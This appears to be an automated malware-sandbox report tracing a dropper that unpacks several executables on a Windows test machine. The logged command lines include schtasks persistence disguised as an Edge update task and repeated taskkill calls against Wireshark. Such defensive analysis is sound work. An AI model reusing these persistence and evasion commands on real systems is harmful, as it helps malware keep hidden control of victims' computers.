PID 3048 wrote to memory of 1744	3048	firefox.exe	83
PID 3048 wrote to memory of 1744	3048	firefox.exe	83
PID 3048 wrote to memory of 1744	3048	firefox.exe	83
PID 3048 wrote to memory of 1744	3048	firefox.exe	83

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

Hidden Files and Directories

T1564.001

pid	Process
2992	attrib.exe
2312	attrib.exe
4700	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:568
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f27a625-c529-4fb3-a9cc-2e438c9b9be0} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" gpu
    3⤵
    PID:4712
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25069d3e-8510-4985-9f9f-27bbe19c3a45} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" socket
    3⤵
    - Checks processor information in registry
    PID:1744
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3284 -childID 1 -isForBrowser -prefsHandle 3068 -prefMapHandle 2856 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 948 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c5e116c-fcda-47ca-985d-99c11ccaf994} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" tab
    3⤵
    PID:684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3632 -childID 2 -isForBrowser -prefsHandle 3628 -prefMapHandle 3108 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 948 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {daf37f60-1a03-4078-b1bc-50193135f278} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" tab
    3⤵
    PID:2428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4760 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4020 -prefMapHandle 4724 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fa09d5d-310d-4772-990e-923d1fbe4d91} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" utility
    3⤵
    - Checks processor information in registry
    PID:5000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 3 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 948 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4e69843-dc62-41c8-9b5d-d4b85018682c} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" tab
    3⤵
    PID:5056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3464 -childID 4 -isForBrowser -prefsHandle 5764 -prefMapHandle 5768 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 948 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b340986-5c6b-41d8-b1e3-8d9e7e2bbc92} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" tab
    3⤵
    PID:5064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1544 -childID 5 -isForBrowser -prefsHandle 5952 -prefMapHandle 5960 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 948 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4ad7c79-fc43-48ce-bc36-67f7a4939f7e} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" tab
    3⤵
    PID:1036
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6272 -childID 6 -isForBrowser -prefsHandle 6300 -prefMapHandle 6220 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 948 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa7a6b6f-84c4-4062-8fbc-a4b77d0c0ccb} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" tab
    3⤵
    PID:1848
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6532 -childID 7 -isForBrowser -prefsHandle 6448 -prefMapHandle 6456 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 948 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9aa95a57-1166-4373-914d-854305f0cebc} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" tab
    3⤵
    PID:1540
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -parentBuildID 20240401114208 -prefsHandle 5580 -prefMapHandle 5524 -prefsLen 32670 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c672b79c-dac0-487f-a028-261032e9827d} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" rdd
    3⤵
    PID:1108
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4492 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 4472 -prefMapHandle 5552 -prefsLen 32670 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d7d4c54-9f5e-44c8-94eb-27e7088aca4c} 3048 "\\.\pipe\gecko-crash-server-pipe.3048" utility
    3⤵
    - Checks processor information in registry
    PID:2960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb91bbcc40,0x7ffb91bbcc4c,0x7ffb91bbcc58
  2⤵
  PID:3284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1960 /prefetch:2
  2⤵
  PID:4600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1740,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  PID:4640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2228 /prefetch:8
  2⤵
  PID:2040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3108 /prefetch:1
  2⤵
  PID:244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:2996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:1420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:2824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8
  2⤵
  PID:1888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4748 /prefetch:8
  2⤵
  PID:1160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5004 /prefetch:8
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4900,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5208 /prefetch:2
  2⤵
  PID:72
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Windows directory
  PID:1020
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff6db734698,0x7ff6db7346a4,0x7ff6db7346b0
    3⤵
    - Drops file in Windows directory
    PID:4456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4532,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:2532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4436,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:1
  2⤵
  PID:2368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3124,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3436 /prefetch:1
  2⤵
  PID:4816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3560,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4340 /prefetch:8
  2⤵
  PID:3364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3088,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:8
  2⤵
  - Modifies registry class
  PID:2728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5252,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=212 /prefetch:8
  2⤵
  PID:4480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3100,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4076 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1252,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5548 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1176,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5592 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4076,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5560 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:4564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5408,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:4032
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5016
  - - C:\Users\Admin\Desktop\Files\handeltest.exe
      "C:\Users\Admin\Desktop\Files\handeltest.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4732
  - - C:\Users\Admin\Desktop\Files\Syncing.exe
      "C:\Users\Admin\Desktop\Files\Syncing.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2976
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "sync" /tr '"C:\Users\Admin\AppData\Roaming\sync.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1480
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "sync" /tr '"C:\Users\Admin\AppData\Roaming\sync.exe"'
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF549.tmp.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2492
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:852
      - C:\Users\Admin\AppData\Roaming\sync.exe
        
        "C:\Users\Admin\AppData\Roaming\sync.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:220
  - - C:\Users\Admin\Desktop\Files\cdb.exe
      "C:\Users\Admin\Desktop\Files\cdb.exe"
      4⤵
      Executes dropped EXE
      PID:396
  - - C:\Users\Admin\Desktop\Files\kg.exe
      "C:\Users\Admin\Desktop\Files\kg.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4868
  - - C:\Users\Admin\Desktop\Files\main.exe
      "C:\Users\Admin\Desktop\Files\main.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1204
    - - C:\ProgramData\dllhost.exe
        
        "C:\ProgramData\dllhost.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:4708
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:1612
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1160
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3848
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3544
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2416
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2424
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3112
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5012
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4068
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:5844
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:5904
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5948
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:5816
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:2828
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2176
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:5676
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:2876
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5596
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:6184
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:6316
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3148
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:6888
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:6268
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1292
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:7008
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:4860
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6932
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:7296
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:1436
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6084
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:6520
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:5872
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4164
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:7324
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:6908
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7624
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:8812
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:7868
